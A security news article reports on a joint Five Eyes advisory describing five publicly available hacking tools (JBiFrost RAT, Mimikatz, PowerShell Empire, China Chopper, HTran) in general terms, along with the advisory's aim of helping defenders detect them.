Five Eyes Intelligence agencies warn of popular hacking tools

Security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools.

Experts from cybersecurity agencies from Five Eyes intelligence alliance have issued a report that provides technical details on most popular hacking tool families and the way to detect and neutralizes attacks involving them.

The report was realized with the contribute of the researchers from the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5]” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The experts analyzed the JBiFrost RAT, that is a variant of Adwind backdoor, that was used by almost any kind of attackers from nation-state hackers to low-skilled crooks.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also describes the popular post–exploitation tool Mimikatz that was used by many threat actors and the lateral movement framework PowerShell Empire, this latter is used by attackers to elevate privileges, harvest credentials, find nearby hosts, and move laterally across the target network.

The experts at Five Eyes agencies also detailed the China Chopper web shell, a code injection web shell that executes Microsoft .NET code within HTTP POST commands.

The China Chopper is a tiny shell (4K) widely used in attacks in the wild since 2012, early this year the China-linked APT group Leviathan. aka TEMP.Periscope, used it in attacks on engineering and maritime entities over the past months.

Another hacking tool described in the report is HUC Packet Transmitter (HTran), that could be exploited by attackers to obfuscate communications with the intent bypass security controls and evade detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – Five Eyes, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.